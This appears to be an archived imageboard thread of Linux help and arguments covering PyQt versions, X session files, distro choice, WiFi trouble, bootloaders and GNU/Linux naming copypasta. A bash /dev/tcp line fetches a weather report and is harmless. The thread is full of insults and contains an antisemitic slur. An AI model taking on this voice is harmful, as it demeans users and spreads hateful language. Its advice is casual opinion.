
I have python3-qt5 installed and it's version 5.7, the qutebrowser says that you need 5.2
>>
Is there any advanced distro picker?
>>
>>61405657
lol slackware is shit. GL with those depedencies
>>
File: 1496726264237.png (352KB, 1920x1080px) Image search: [Google]
1496726264237.png
352KB, 1920x1080px
My shitop AMD Processor 4 gb ram from years ago will go into kernel panic if I boot, unless I boot from safe mode then into normal mode. Is my hardware just fucked
>>
>>61411896
IDK about that packaging shit but I'm running it on 5.7 and it isn't crashing.
>>
>>61411855
I feel like you're speaking another language that I don't yet know with all that jargon.
I did find /etc/X11/Xsession and the lines that reference other session scripts:
OPTIONFILE=/etc/X11/Xsession.option
SYSRESOURCES=/etc/X11/Xresources
USRRESOURCES=$HOME/.Xresources
SYSSESSIONDIR=/etc/X11/Xsession.d
USERXSESSION=$HOME/.xsession
USERXSESSIONRC=$HOME/.xsessionrc
ALTUSERXSESSION=$HOME/.Xsession
ERRFILE=$HOME/.xsession-errors

...ok so I dug into the 50x11-common_determine-startup file and I think I see where it's finding i3.
Does this mean that I can just create a copy of .Xsession in my home directory and that will govern? I'm still not sure where/how ibus is being called -- but that's okay.
Thanks, Anon.
>>
>>61411896
Isn't python-qt5 and pyq5 two different packages?
Error log says it rquires PyQt5 version 5.9.
>>
>>61412113
Yeah, it looks like you can run you wm from ~/.Xsession and it will still wrap it with ibus or whatever it does.
Or you can use ~/.xinitrc and start you wm from there and that will make all the xsession stuff not run.
>>
First week using a non-traditional distro, manjaro gave me such a confidence during this past days that i never had on previous systems (i've used ubuntu, fedora, debian and arch already). I think i'm more than ready to drop windows definitively, i'm just very happy and satisfied with this beauty.
>>
>>61411902
brain.exe
>>
>>61412290
Welcome home.
>>
How can I find out which console font I'm currently using?
>>
>>61412290
manjaro and arch are the same thing
>>
>>61412623
No. Manjaro is Manjaro. Arch is Arch.
>>
>>61412623
Antergos and arch are the same thing.

My arch experience was basically choosing every bit of software installed on my system and tweaking the os by myself. Manjaro gives me a desktop fully functional, a nice default theme for xfce and a pleasant icon pack, a bunch of lightweight programs like viewnior and viewnior, not mentioning the pre-installed package manager for pacman.

Manjaro is more like "arch made easy"
>>
>>61412621
Does it have an graphical interface?

>help tab>about
>>
>>61412732
No. Antergos is Antergos. Arch is Arch.
>>
>>61412766
B-but antergos isn't just arch+gui installer?
>>
>>61412766
idiot
>>
>>61412781
No. Andergos is a distribution based on Arch.
>>61412786
Friendly thread.
>>
>>61412781
arch-anywhere is arch+installer
>>
File: IMG_0796.jpg (15KB, 480x360px) Image search: [Google]
IMG_0796.jpg
15KB, 480x360px
For some reason my PC won't connect to WiFi. I've tried both distributions on my HDD (Manjaro and Backbox) and a Live session and nothing will connect but my phone connects fine. What the fuck is going on? No updates in the past couple of weeks either, everything is the same.
>>
>>61412902
nice pepe
>>>/r/eddit
>>
>>61412968
Dumb >>> poster.
>>
File: 1493927296065.jpg (44KB, 450x548px) Image search: [Google]
1493927296065.jpg
44KB, 450x548px
>tfw bash can tcp/ip
exec 3<>/dev/tcp/wttr.in/80;printf 'GET https://wttr.in HTTP/1.0\r\nUser-Agent: curl\r\n\r\n' >&3; cat <&3
>>
>>61412902
Why does this picture have black bars?
>>
>>61413146
Cinematic effect
>>
>>61413146
obviously it's a jewtube thumb
>>
>>61413181
What do black bars have to do with that? Nothing.
>>
how is wine able to run newer games if it doesn't support anything higher than directx9??
>>
>>61413225
magic
>>
is steam open source???
>>
>>61413391
Open Source is a meme.
https://www.gnu.org/philosophy/open-source-misses-the-point.html
>>
>>61413391
are u on drugs?
>>
>>61393906
I need a GNU/linux live USB that has the gnome-disks utility. Anyone know of one.
pls repsond
>>
>>61413391
Yeah its on github.
>>
>>61413436
probably fedora
>>
>>61413417
Open source is all I care about. Idgaf about that other shit. I just don't want secret code executing on my shit.
>>
>>61413567
>I just don't want secret code executing on my shit.
Thats the point why Open Source sucks. When a product is labeled "Open Source", the code of the main project may be available but drivers, plugins, addons, etc which come with the product can be proprietary (eg. secret code executing on your shit).
>>
what is currently the best terminal?
>>
>>61413567
Open source doesn't prevent any of your "secret shit" from executing you drooling manchild
>>
>>61413717
st + scrollback patch if you like it FAST and tiny.
urxvt if you care about muh rice and changing your colorscheme every 30 minutes.
>>
>>61413223
Are you stupid, anon?
>>
>>61413977
You are. Youtube thumbnails dont have black bars dumbfuck. That one might but its not a requirement or even a meme.
>>
>>61414082
Listen here you little shit. Someone made a video with that Pepe image without adjusting actual frame width and YouTube generated a thumbnail for that video.
Case in point: searching "sad pepe" in Google Images provides a link to this image: https://i.ytimg.com/vi/GYnxkfMPxEw/maxresdefault.jpg that just happens to be a YouTube thumbnail of this video: https://www.youtube.com/watch?v=GYnxkfMPxEw
>>
>>61414147
Good effort but you're still wrong.
>>
File: 1481403862065.jpg (67KB, 1280x720px) Image search: [Google]
1481403862065.jpg
67KB, 1280x720px
>>61414225
roflcopter
>>
File: hqdefault.jpg (16KB, 480x360px) Image search: [Google]
hqdefault.jpg
16KB, 480x360px
>you will never have vertical bars
>>
File: 1499613844488.png (1MB, 1082x1268px) Image search: [Google]
1499613844488.png
1MB, 1082x1268px
>>61414285
>>
>>61414225
Final proof: if you search the hash of that image in archive you will get a few results that list the original filename as hqdefault.jpg.
Moreover, one anon renamed that file as "pepesdeath.jpg". If you search "pepe's death" in Google Images you will get this thumbnail: https://i.ytimg.com/vi/qTJ99SWXYmk/hqdefault.jpg.

But if you have a better explanation for black bars feel free to present it. :^)
>>
>>61414309
Cinematic effect
>>
>>61414324
>ifunny
REEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
>>
>>61414338
>he dusnt have the ifunny app

Lmao loser
>>
File: 1486780689877.jpg (59KB, 850x400px) Image search: [Google]
1486780689877.jpg
59KB, 850x400px
>>61414348
Reminder.
>>
>>61414426
I assure you that the people here aren't pretending to be idiots
>>
so, now that /fglt/ is dead, where do we go
>>
>>61414497
There is no better place
>>
>>61411896
I guess you did "tox -e mkvenv-pypi" which installs PyQt from PyPI (i.e. via Python's package manager, pip). That'll not work if you have a Python older than 3.5, or are on something other than x86 (32/64bit).

You might want "tox -e mkvenv" instead, which uses your system-wide PyQt install.
>>
Debian stable netinstall has failed 3 times in a row now on the download and set up software stage.
I am downloading the ISO now. Should I just try another distribution? I am worried about stability. I've used Debian and Ubuntu both with KDE on VM's and USB live disks but I want to give Windows the flick permanently so I need something robust.
>>
File: 1499587206513.jpg (103KB, 754x1158px) Image search: [Google]
1499587206513.jpg
103KB, 754x1158px
>>61412902
It just started working again out of the blue. Weird. It was like the router was allowing phones to connect but not PCs
>>
>>61414820
Debian is the most robust system you can get.
>>
>>61414920
>tfw no black bars on your image to start controversy
>>
>>61414928

That's what I figured but it's been 40 hours + on this net install with numerous failures (I am assuming download issues) that are worrying me. I'll try an ISO install.
>>
>>61414820
>>61414928

Right now that Debian Stretch is still recent, it's fine. In a few months to years, you'll need to switch to Debian unstable unless you want outdated and buggy software everywhere...
>>
Why should I install Linux when I can install it in Windows from the store?
>>
>>61415234
>why should I install x when I can install it
?!
>>
>>61415234
Linux is a kernel. All this "Ubuntu on Windows" crap does NOT include Linux. It uses Windows' kernel NT.

You should install GNU+Linux to reclaim your computer and get work done instead of being spied on and sold out aka Freedom.

Get an usb drive, put a distro on it, try it, love it, overwrite Windows.
>>
Linus is just kernel of the GNU operating system
>>
Computers running Windows aka "Windows Computer" should be referred to as WC to differentiate from computers that run other operating systems.
>>
File: ifunny.jpg (58KB, 500x459px) Image search: [Google]
ifunny.jpg
58KB, 500x459px
>>61414324
>>
I'm going to reinstall gentoo on a uefi-enabled computer w/ luks and lvm. I want to turn on my computer, enter my password, and boot in with gentoo.

Is there any reason to use grub vs stub kernel? Is there any reason not to use grub in this case?

Is the latter faster? What if I configure grub to just boot immediately?

I'm contemplating using systemd. Does systemd play nice with luks. The manual says it will work, but some people say otherwise.
>>
>>61415904
GRUB does not support f2fs, which is a nice filesystem for SSDs.
>>
File: 1471283770769.jpg (10KB, 500x459px) Image search: [Google]
1471283770769.jpg
10KB, 500x459px
>>61415764
needs more jpg
>>
>>61401467
Notepadqq is literally fucking designed to be notepad++ never used that other program though.
>>
>>61413225
It recently got support for DX11 but it's still experimental I believe.
>>
What is the best distro?
>>
>>61416383
FreeBSD.
>>
>>61416392
L O L p0wned
>>
>>61416392
But only cucks use BSD.
>>
>>61416420
>But only Theo uses BSD.
>>
>>61416383
Source Mage GNU/Linux
>>
>>61416420
But only cucks do BDSM :^)
>>
Anyone knows some funny *nix jokes?
>>
>>61416687
https://www.gnu.org/fun/humor.html
>>
Is Linux easier to upgrade these days? I haven't used Linux in a few years and was wondering if you still have to go into the command line and possibly mess up your upgrade from release to release (not LTS) for easier distros linux Ubuntu or Mint?
>>
>>61416905
install gentoo
>>
File: 1476268508405.png (209KB, 432x385px) Image search: [Google]
1476268508405.png
209KB, 432x385px
>>61416905
I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.
>>
>>61416905
yes
>>
>>61416905
Upgrade to next version? It's possible to mess that with WIndows as well, which is why you should go for clean install, regardless of your OS.
>>
What's your favorite way to shutdown?
>>
>>61417186
>shutting down
why
>>
i've been using various puppy distros on my shitpad laptop for a few years now, however i'm assembling a desktop and i'm looking for a decent distro, ubuntu seems kind of bloated and i can't be arsed with arch, is xubuntu /fglt/ approved?
>>
>>61417080

No, Richard, it's 'Linux', not 'GNU/Linux'. The most important contributions that the FSF made to Linux were the creation of the GPL and the GCC compiler. Those are fine and inspired products. GCC is a monumental achievement and has earned you, RMS, and the Free Software Foundation countless kudos and much appreciation.

Following are some reasons for you to mull over, including some already answered in your FAQ.
One guy, Linus Torvalds, used GCC to make his operating system (yes, Linux is an OS -- more on this later). He named it 'Linux' with a little help from his friends. Why doesn't he call it GNU/Linux? Because he wrote it, with more help from his friends, not you. You named your stuff, I named my stuff -- including the software I wrote using GCC -- and Linus named his stuff. The proper name is Linux because Linus Torvalds says so. Linus has spoken. Accept his authority. To do otherwise is to become a nag. You don't want to be known as a nag, do you?

(An operating system) != (a distribution). Linux is an operating system. By my definition, an operating system is that software which provides and limits access to hardware resources on a computer. That definition applies wherever you see Linux in use. However, Linux is usually distributed with a collection of utilities and applications to make it easily configurable as a desktop system, a server, a development box, or a graphics workstation, or whatever the user needs. In such a configuration, we have a Linux (based) distribution. Therein lies your strongest argument for the unwieldy title 'GNU/Linux' (when said bundled software is largely from the FSF). Go bug the distribution makers on that one. Take your beef to Red Hat, Mandrake, and Slackware. At least there you have an argument. Linux alone is an operating system that can be used in various applications without any GNU software whatsoever. Embedded applications come to mind as an obvious example.
>>
>>61417887
>>61417080

Next, even if we limit the GNU/Linux title to the GNU-based Linux distributions, we run into another obvious problem. XFree86 may well be more important to a particular Linux installation than the sum of all the GNU contributions. More properly, shouldn't the distribution be called XFree86/Linux? Or, at a minimum, XFree86/GNU/Linux? Of course, it would be rather arbitrary to draw the line there when many other fine contributions go unlisted. Yes, I know you've heard this one before. Get used to it. You'll keep hearing it until you can cleanly counter it.

You seem to like the lines-of-code metric. There are many lines of GNU code in a typical Linux distribution. You seem to suggest that (more LOC) == (more important). However, I submit to you that raw LOC numbers do not directly correlate with importance. I would suggest that clock cycles spent on code is a better metric. For example, if my system spends 90% of its time executing XFree86 code, XFree86 is probably the single most important collection of code on my system. Even if I loaded ten times as many lines of useless bloatware on my system and I never executed that bloatware, it certainly isn't more important code than XFree86. Obviously, this metric isn't perfect either, but LOC really, really sucks. Please refrain from using it ever again in supporting any argument.
>>
>>61417080
>>61417887
>>61417895

Last, I'd like to point out that we Linux and GNU users shouldn't be fighting among ourselves over naming other people's software. But what the heck, I'm in a bad mood now. I think I'm feeling sufficiently obnoxious to make the point that GCC is so very famous and, yes, so very useful only because Linux was developed. In a show of proper respect and gratitude, shouldn't you and everyone refer to GCC as 'the Linux compiler'? Or at least, 'Linux GCC'? Seriously, where would your masterpiece be without Linux? Languishing with the HURD?

If there is a moral buried in this rant, maybe it is this. Be grateful for your abilities and your incredible success and your considerable fame. Continue to use that success and fame for good, not evil. Also, be especially grateful for Linux' huge contribution to that success. You, RMS, the Free Software Foundation, and GNU software have reached their current high profiles largely on the back of Linux. You have changed the world. Now, go forth and don't be a nag.

Thanks for listening.
>>
File: 1472854959121.jpg (63KB, 480x411px) Image search: [Google]
1472854959121.jpg
63KB, 480x411px
>>61417900
>>61417895
>>61417887
y so mad tho senpai. Linux will always be Linux. GNU will always be GNU. GNU/Linux is the combination of both.
>>
Reminder to report useless noise comments like the ones above and the "interject" meme.
>>
>>61418244
Unlike the posts above, "the "interject" meme" is useful information.
>>
>even Linus doesn't trust systemd
https://www.theregister.co.uk/2017/07/17/linux_4_13_rc1/
>>
>>61418334
WTF.I still LOVE Linus now
>>
>>61418334

>the article claims it's due to the systemd bugs
>doesn't back up that claim

What does [RFC][PATCH] exec: Use init rlimits for setuid exec have to do with the recent two "popular" systemd bugs?
>>
I have a modem connected to a wi-fi router (netgear). I'm using a wired connection. I used to connect the modem to the router and then a wired connection from the router to my pc. Everything worked.

Now, I can only access the internet by connecting my pc to the modem but the wifi still works if I connect my router to my modem.

Also I can't access the configuration page of the modem.

>have you tried to turn it off and on again
yes
>>
Do I need a firewall or something on Linux ?
How to protect myself ?
>>
>>61418619
So what exactly is your problem?
Be specific
>>
>>61418639
I can't access the configuration page for my modem, and I can't connect if I connect physically via the router.
>>
>>61418636
ufw https://wiki.archlinux.org/index.php/Ufw
>>
What's the easiest way to share media content (movies, videos, music, e-docs ecc.ecc.) between a server running Windows Server 2008 and multiple computers running Xubuntu? We tried to configure Plex but we encountered several issues.
>>
>>61418711
minidlna

>>61418676
>>61418619
answer pls
>>
>>61418636
>How to protect myself ?
Dont run proprietary software and you're fine.
>>
New thread: >>61418845
Thread posts: 312
Thread images: 40

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.